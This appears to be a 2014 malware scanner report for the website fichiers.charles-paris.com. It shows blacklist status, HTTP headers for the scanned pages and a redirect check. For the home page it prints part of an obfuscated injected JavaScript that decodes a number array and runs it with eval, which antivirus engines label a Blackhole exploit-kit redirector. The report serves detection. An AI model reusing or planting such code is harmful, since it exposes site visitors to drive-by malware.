New scan:

Malware Scanner report for fichiers.charles-paris.com

Malicious/Suspicious/Total urls checked
1/0/19
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "fichiers.charles-paris.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=fichiers.charles-paris.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://fichiers.charles-paris.com/
200 OK
Content-Length: 7851
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

b=new function(){return 2;};if(!+b)String.prototype.test='harC';for(i in $='esrhserh')if(i=='te'+'st')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document['c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d'+'e']('321');if(a.data==321)x=-1*(d-d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+1
... 3148 bytes are skipped ...
+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+44,-x+95,-x+110,-x+110,-x+99,-x+108,-x+98,-x+65,-x+102,-x+103,-x+106,-x+98,-x+38,-x+100,-x+39,-x+57,-x+7,-x+7,-x+123];for(i=0;i<n.length;i++)ss+=s(eval("n"+"[i"+"]"));eval(ss);

Antivirus reports:

AntiVir
JS/Redirector.LC
Avast
JS:Redirector-KD [Trj]
Ikarus
Trojan.JS.IFrame
nProtect
Trojan.JS.Agent.ELF
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Agent.ELF (B)
Comodo
TrojWare.JS.Iframe.AN
McAfee-GW-Edition
JS/Exploit-Blacole.da
DrWeb
JS.IFrame.151
Kaspersky
Trojan-Downloader.JS.Agent.gkb
Microsoft
Exploit:JS/Blacole.G
MicroWorld-eScan
Trojan.JS.Agent.ELF
Fortinet
JS/Iframe.W!tr
TotalDefense
JS/BlacoleRef.E
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.da
NANO-Antivirus
Trojan.Script.Agent.dtkph
F-Secure
Trojan.JS.Agent.ELF
F-Prot
JS/IFrame.HC.gen
AVG
HTML/Framer.FC
GData
Trojan.JS.Agent.ELF
Commtouch
JS/IFrame.HC.gen
BitDefender
Trojan.JS.Agent.ELF

http://fichiers.charles-paris.com/VOMB
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 17:32:46 GMT
Location: http://fichiers.charles-paris.com/VOMB/
Server: Apache
Vary: Accept-Encoding
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 720planBAK=R3744886473; path=/; expires=Sat, 27-Dec-2014 18:31:15 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:41:22 GMT
clean
http://fichiers.charles-paris.com/vomb/
404 Not Found
Content-Length: 203
Content-Type: text/html
clean
http://fichiers.charles-paris.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://fichiers.charles-paris.com/NKMB
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 17:32:46 GMT
Location: http://fichiers.charles-paris.com/NKMB/
Server: Apache
Vary: Accept-Encoding
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 720planBAK=R3744915876; path=/; expires=Sat, 27-Dec-2014 18:41:04 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:40:53 GMT
clean
http://fichiers.charles-paris.com/nkmb/
404 Not Found
Content-Length: 203
Content-Type: text/html
clean
http://fichiers.charles-paris.com/MD
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 17:32:46 GMT
Location: http://fichiers.charles-paris.com/MD/
Server: Apache
Vary: Accept-Encoding
Content-Length: 245
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 720planBAK=R3744882117; path=/; expires=Sat, 27-Dec-2014 18:41:24 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:40:53 GMT
clean
http://fichiers.charles-paris.com/md/
404 Not Found
Content-Length: 201
Content-Type: text/html
clean
http://fichiers.charles-paris.com/CF
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 17:32:47 GMT
Location: http://fichiers.charles-paris.com/CF/
Server: Apache
Vary: Accept-Encoding
Content-Length: 245
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 720planBAK=R3744889740; path=/; expires=Sat, 27-Dec-2014 18:31:15 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:41:13 GMT
clean
http://fichiers.charles-paris.com/cf/
404 Not Found
Content-Length: 201
Content-Type: text/html
clean
http://fichiers.charles-paris.com/DNK
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 17:32:47 GMT
Location: http://fichiers.charles-paris.com/DNK/
Server: Apache
Vary: Accept-Encoding
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 720planBAK=R3744915876; path=/; expires=Sat, 27-Dec-2014 18:34:07 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:41:58 GMT
clean
http://fichiers.charles-paris.com/dnk/
404 Not Found
Content-Length: 202
Content-Type: text/html
clean
http://fichiers.charles-paris.com/DOR
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 17:32:48 GMT
Location: http://fichiers.charles-paris.com/DOR/
Server: Apache
Vary: Accept-Encoding
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 720planBAK=R3744887562; path=/; expires=Sat, 27-Dec-2014 18:31:15 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:41:57 GMT
clean
http://fichiers.charles-paris.com/dor/
404 Not Found
Content-Length: 202
Content-Type: text/html
clean
http://fichiers.charles-paris.com/ARG
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 17:32:48 GMT
Location: http://fichiers.charles-paris.com/ARG/
Server: Apache
Vary: Accept-Encoding
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 720planBAK=R3744883206; path=/; expires=Sat, 27-Dec-2014 18:34:07 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:49:11 GMT
clean
http://fichiers.charles-paris.com/arg/
404 Not Found
Content-Length: 202
Content-Type: text/html
clean
http://fichiers.charles-paris.com/VA
404 Not Found
Content-Length: 200
Content-Type: text/html
clean
http://fichiers.charles-paris.com/BEST
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 17:32:49 GMT
Location: http://fichiers.charles-paris.com/BEST/
Server: Apache
Vary: Accept-Encoding
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 720planBAK=R3744883206; path=/; expires=Sat, 27-Dec-2014 18:41:04 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:51:16 GMT
clean
http://fichiers.charles-paris.com/best/
404 Not Found
Content-Length: 203
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: fichiers.charles-paris.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 17:32:45 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 7851
Content-Type: text/html
Set-Cookie: 720planBAK=R3744915876; path=/; expires=Sat, 27-Dec-2014 18:41:04 GMT
Set-Cookie: 720plan=R3438332924; path=/; expires=Sat, 27-Dec-2014 18:51:16 GMT

...7851 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fichiers.charles-paris.com
Referer: http://www.google.com/search?q=fichiers.charles-paris.com

Result:
The result is similar to the first query. There are no suspicious redirects found.